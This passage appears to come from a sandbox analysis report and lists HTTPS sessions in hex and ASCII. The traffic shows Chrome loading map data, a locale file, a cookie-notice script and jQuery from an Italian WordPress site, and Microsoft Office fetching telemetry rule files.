                                                                                                                                          Data Ascii: 21.3907,42.7515],[21.0569,43.0915],[20.3445,42.8278],[19.5517,43.2122],[19.1943,43.5331],[19.4882,43.7036],[19.1517,44.3024],[19.3568,44.8586],[19.007,44.8693],[19.0549,45.5271],[18.9054,45.9315],[19.5308,46.1552],[20.2419,46.1086]]]},properties:{name:"Se
                                                                                                                                          2024-11-28 10:33:01 UTC8000INData Raw: 2c 32 36 2e 35 39 34 37 5d 2c 5b 33 35 2e 35 38 31 35 2c 32 37 2e 34 33 32 33 5d 2c 5b 33 35 2e 31 38 30 37 2c 32 38 2e 30 33 34 37 5d 2c 5b 33 34 2e 36 31 36 2c 32 38 2e 31 34 38 33 5d 2c 5b 33 34 2e 37 37 39 38 2c 32 38 2e 35 30 37 34 5d 2c 5b 33 34 2e 39 35 30 37 2c 32 39 2e 33 35 33 35 5d 2c 5b 33 36 2e 30 31 35 36 2c 32 39 2e 31 39 30 36 5d 2c 5b 33 36 2e 34 37 35 39 2c 32 39 2e 34 39 35 31 5d 2c 5b 33 36 2e 37 35 35 31 2c 32 39 2e 38 36 36 32 5d 2c 5b 33 37 2e 34 36 39 34 2c 32 39 2e 39 39 34 39 5d 2c 5b 33 37 2e 36 33 33 36 2c 33 30 2e 33 31 33 32 5d 2c 5b 33 37 2e 39 38 30 33 2c 33 30 2e 35 5d 2c 5b 33 36 2e 39 35 38 34 2c 33 31 2e 34 39 31 37 5d 2c 5b 33 38 2e 39 36 32 32 2c 33 31 2e 39 39 35 31 5d 2c 5b 33 39 2e 31 34 35 35 2c 33 32 2e 31 32 34
                                                                                                                                          Data Ascii: ,26.5947],[35.5815,27.4323],[35.1807,28.0347],[34.616,28.1483],[34.7798,28.5074],[34.9507,29.3535],[36.0156,29.1906],[36.4759,29.4951],[36.7551,29.8662],[37.4694,29.9949],[37.6336,30.3132],[37.9803,30.5],[36.9584,31.4917],[38.9622,31.9951],[39.1455,32.124
                                                                                                                                          2024-11-28 10:33:01 UTC8000INData Raw: 5b 33 35 2e 34 31 31 35 2c 35 30 2e 35 33 39 38 5d 2c 5b 33 35 2e 33 31 32 31 2c 35 31 2e 30 34 33 38 5d 2c 5b 33 34 2e 32 38 30 39 2c 35 31 2e 33 31 31 37 5d 2c 5b 33 34 2e 33 39 37 36 2c 35 31 2e 37 38 30 34 5d 2c 5b 33 33 2e 37 33 35 33 2c 35 32 2e 33 34 34 38 5d 2c 5b 33 32 2e 35 30 38 2c 35 32 2e 33 30 38 34 5d 2c 5b 33 31 2e 37 36 33 36 2c 35 32 2e 31 30 31 32 5d 2c 5b 33 31 2e 35 37 37 31 2c 35 32 2e 33 31 32 32 5d 2c 5b 33 31 2e 34 31 37 38 2c 35 33 2e 31 39 36 5d 2c 5b 33 32 2e 31 34 32 32 2c 35 33 2e 30 39 31 33 5d 2c 5b 33 32 2e 37 30 34 32 2c 35 33 2e 33 33 36 33 5d 2c 5b 33 31 2e 37 39 32 2c 35 34 2e 30 35 35 38 5d 2c 5b 33 31 2e 34 30 33 36 2c 35 34 2e 31 39 35 39 5d 2c 5b 33 31 2e 31 32 31 33 2c 35 34 2e 36 34 38 34 5d 2c 5b 33 30 2e 39 30
                                                                                                                                          Data Ascii: [35.4115,50.5398],[35.3121,51.0438],[34.2809,51.3117],[34.3976,51.7804],[33.7353,52.3448],[32.508,52.3084],[31.7636,52.1012],[31.5771,52.3122],[31.4178,53.196],[32.1422,53.0913],[32.7042,53.3363],[31.792,54.0558],[31.4036,54.1959],[31.1213,54.6484],[30.90
                                                                                                                                          2024-11-28 10:33:01 UTC8000INData Raw: 31 5d 2c 5b 35 35 2e 33 35 36 2c 37 32 2e 34 36 35 31 5d 2c 5b 35 35 2e 32 39 37 38 2c 37 31 2e 39 33 35 34 5d 2c 5b 35 37 2e 31 34 35 38 2c 37 30 2e 35 38 39 5d 2c 5b 35 34 2e 36 30 30 39 2c 37 30 2e 36 38 5d 2c 5b 35 33 2e 37 32 32 35 2c 37 30 2e 38 31 34 35 5d 2c 5b 35 33 2e 33 36 33 38 2c 37 31 2e 35 34 31 36 5d 2c 5b 35 31 2e 38 31 32 34 2c 37 31 2e 34 39 31 32 5d 2c 5b 35 31 2e 35 38 32 35 2c 37 32 2e 30 37 31 32 5d 2c 5b 35 32 2e 36 32 32 31 2c 37 32 2e 33 30 30 39 5d 2c 5b 35 33 2e 37 35 33 31 2c 37 33 2e 32 39 33 32 5d 2c 5b 35 35 2e 33 32 2c 37 33 2e 33 30 38 33 5d 5d 5d 5d 7d 2c 70 72 6f 70 65 72 74 69 65 73 3a 7b 6e 61 6d 65 3a 22 52 75 73 73 69 61 22 2c 69 64 3a 22 52 55 22 7d 2c 69 64 3a 22 52 55 22 7d 2c 7b 74 79 70 65 3a 22 46 65 61 74 75
                                                                                                                                          Data Ascii: 1],[55.356,72.4651],[55.2978,71.9354],[57.1458,70.589],[54.6009,70.68],[53.7225,70.8145],[53.3638,71.5416],[51.8124,71.4912],[51.5825,72.0712],[52.6221,72.3009],[53.7531,73.2932],[55.32,73.3083]]]]},properties:{name:"Russia",id:"RU"},id:"RU"},{type:"Featu
                                                                                                                                          2024-11-28 10:33:02 UTC8000INData Raw: 39 31 36 33 5d 2c 5b 31 31 38 2e 34 33 34 38 2c 39 2e 32 35 36 32 5d 2c 5b 31 31 37 2e 39 38 39 36 2c 38 2e 38 37 37 32 5d 2c 5b 31 31 37 2e 33 31 30 39 2c 38 2e 34 33 39 35 5d 5d 5d 2c 5b 5b 5b 31 32 34 2e 35 37 34 37 2c 31 31 2e 33 34 33 5d 2c 5b 31 32 34 2e 39 32 39 39 2c 31 31 2e 33 37 32 37 5d 2c 5b 31 32 35 2e 30 31 33 33 2c 31 30 2e 37 38 35 34 5d 2c 5b 31 32 35 2e 32 35 33 35 2c 31 30 2e 32 36 33 39 5d 2c 5b 31 32 35 2e 30 32 36 36 2c 31 30 2e 30 33 33 31 5d 2c 5b 31 32 34 2e 37 38 30 37 2c 31 30 2e 31 36 38 5d 2c 5b 31 32 34 2e 37 38 36 39 2c 31 30 2e 37 38 31 35 5d 2c 5b 31 32 34 2e 34 34 35 36 2c 31 30 2e 39 32 33 35 5d 2c 5b 31 32 34 2e 35 37 34 37 2c 31 31 2e 33 34 33 5d 5d 5d 2c 5b 5b 5b 31 32 32 2e 34 39 36 34 2c 31 31 2e 36 31 35 31 5d 2c
                                                                                                                                          Data Ascii: 9163],[118.4348,9.2562],[117.9896,8.8772],[117.3109,8.4395]]],[[[124.5747,11.343],[124.9299,11.3727],[125.0133,10.7854],[125.2535,10.2639],[125.0266,10.0331],[124.7807,10.168],[124.7869,10.7815],[124.4456,10.9235],[124.5747,11.343]]],[[[122.4964,11.6151],


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          68192.168.2.4498285.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:01 UTC412OUTGET /wp-content/plugins/lab-finder/lang/locale-it_IT.json?v=1732789977147 HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:33:01 UTC302INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:01 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Wed, 06 Oct 2021 08:44:17 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 1139
                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                          Expires: Thu, 28 Nov 2024 10:33:01 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/json
                                                                                                                                          2024-11-28 10:33:01 UTC1139INData Raw: 7b 0a 20 20 22 43 4f 55 4e 54 52 59 22 3a 20 7b 0a 20 20 20 20 22 54 49 54 4c 45 22 3a 20 22 4e 61 7a 69 6f 6e 65 22 2c 0a 20 20 20 20 22 41 54 22 3a 20 22 41 75 73 74 72 69 61 22 2c 0a 20 20 20 20 22 42 45 22 3a 20 22 42 65 6c 67 69 75 6d 22 2c 0a 20 20 20 20 22 42 47 22 3a 20 22 42 75 6c 67 61 72 69 61 22 2c 0a 20 20 20 20 22 43 41 22 3a 20 22 43 61 6e 61 64 61 22 2c 0a 20 20 20 20 22 43 4e 22 3a 20 22 43 68 69 6e 61 22 2c 0a 20 20 20 20 22 43 59 22 3a 20 22 43 79 70 72 75 73 22 2c 0a 20 20 20 20 22 44 45 22 3a 20 22 47 65 72 6d 61 6e 79 22 2c 0a 20 20 20 20 22 47 52 22 3a 20 22 47 72 65 65 63 65 22 2c 0a 20 20 20 20 22 49 4e 22 3a 20 22 49 6e 64 69 61 22 2c 0a 20 20 20 20 22 49 4c 22 3a 20 22 49 73 72 61 65 6c 22 2c 0a 20 20 20 20 22 49 54 22 3a 20 22
                                                                                                                                          Data Ascii: { "COUNTRY": { "TITLE": "Nazione", "AT": "Austria", "BE": "Belgium", "BG": "Bulgaria", "CA": "Canada", "CN": "China", "CY": "Cyprus", "DE": "Germany", "GR": "Greece", "IN": "India", "IL": "Israel", "IT": "


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          69192.168.2.4498275.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:01 UTC583OUTGET /wp-content/plugins/cookie-notice/js/front.min.js?ver=2.5.4 HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://www.agriparadigma.it/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:33:01 UTC315INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:01 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Wed, 27 Nov 2024 19:03:12 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 8700
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:33:01 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/javascript
                                                                                                                                          2024-11-28 10:33:01 UTC7877INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 43 75 73 74 6f 6d 45 76 65 6e 74 29 72 65 74 75 72 6e 21 31 3b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 29 7b 74 3d 74 7c 7c 7b 62 75 62 62 6c 65 73 3a 21 31 2c 63 61 6e 63 65 6c 61 62 6c 65 3a 21 31 2c 64 65 74 61 69 6c 3a 76 6f 69 64 20 30 7d 3b 76 61 72 20 6e 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 43 75 73 74 6f 6d 45 76 65 6e 74 22 29 3b 72 65 74 75 72 6e 20 6e 2e 69 6e 69 74 43 75 73 74 6f 6d 45 76 65 6e 74 28 65 2c 74 2e 62 75 62 62 6c 65 73 2c 74 2e 63 61 6e 63 65 6c 61 62 6c 65 2c 74 2e 64 65 74 61 69 6c 29 2c 6e 7d 65 2e 70 72 6f 74 6f 74 79 70 65 3d 77 69 6e 64 6f 77 2e 45 76 65 6e 74 2e 70 72
                                                                                                                                          Data Ascii: !function(){if("function"==typeof window.CustomEvent)return!1;function e(e,t){t=t||{bubbles:!1,cancelable:!1,detail:void 0};var n=document.createEvent("CustomEvent");return n.initCustomEvent(e,t.bubbles,t.cancelable,t.detail),n}e.prototype=window.Event.pr
                                                                                                                                          2024-11-28 10:33:01 UTC823INData Raw: 65 74 2e 63 6f 6f 6b 69 65 53 65 74 29 7d 29 3b 6e 75 6c 6c 21 3d 3d 73 26 26 73 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 65 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 2c 6e 2e 73 65 74 53 74 61 74 75 73 28 22 72 65 6a 65 63 74 22 29 7d 29 3b 66 6f 72 28 76 61 72 20 63 3d 30 3b 63 3c 6f 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 6f 5b 63 5d 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 6e 2e 6e 6f 74 69 63 65 43 6f 6e 74 61 69 6e 65 72 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 63
                                                                                                                                          Data Ascii: et.cookieSet)});null!==s&&s.addEventListener("click",function(e){e.preventDefault(),e.stopPropagation(),n.setStatus("reject")});for(var c=0;c<o.length;c++)o[c].addEventListener("click",function(e){e.preventDefault(),n.noticeContainer.classList.contains("c


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          70192.168.2.44983113.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:02 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:02 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 415
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                          ETag: "0x8DC582B9F6F3512"
                                                                                                                                          x-ms-request-id: 9e5d2c34-901e-0083-1a26-41bb55000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103302Z-174f7845968psccphC1EWRuz9s0000000yg0000000007sg0
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:02 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          71192.168.2.44983013.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:02 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:02 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 474
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                          ETag: "0x8DC582B9964B277"
                                                                                                                                          x-ms-request-id: 8ccd6c39-f01e-0085-6e81-3f88ea000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103302Z-174f7845968xlwnmhC1EWR0sv80000000y1g000000008yta
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:02 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          72192.168.2.44983413.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:02 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:03 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 467
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                          ETag: "0x8DC582BA6C038BC"
                                                                                                                                          x-ms-request-id: 3360fb1d-601e-0097-3291-3ff33a000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103303Z-174f7845968zgtf6hC1EWRqd8s0000000ra00000000035gy
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:03 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          73192.168.2.44983313.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:02 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:03 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 632
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                          ETag: "0x8DC582BB6E3779E"
                                                                                                                                          x-ms-request-id: d00750c6-401e-0064-5e1b-4154af000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103303Z-174f7845968pght8hC1EWRyvxg00000001eg000000004zuu
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:03 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          74192.168.2.4498365.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:02 UTC570OUTGET /wp-includes/js/jquery/jquery.min.js?ver=3.6.1 HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://www.agriparadigma.it/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:33:03 UTC316INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:03 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Tue, 28 Mar 2023 12:34:43 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 89684
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:33:03 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/javascript
                                                                                                                                          2024-11-28 10:33:03 UTC7876INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 31 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                          Data Ascii: /*! jQuery v3.6.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
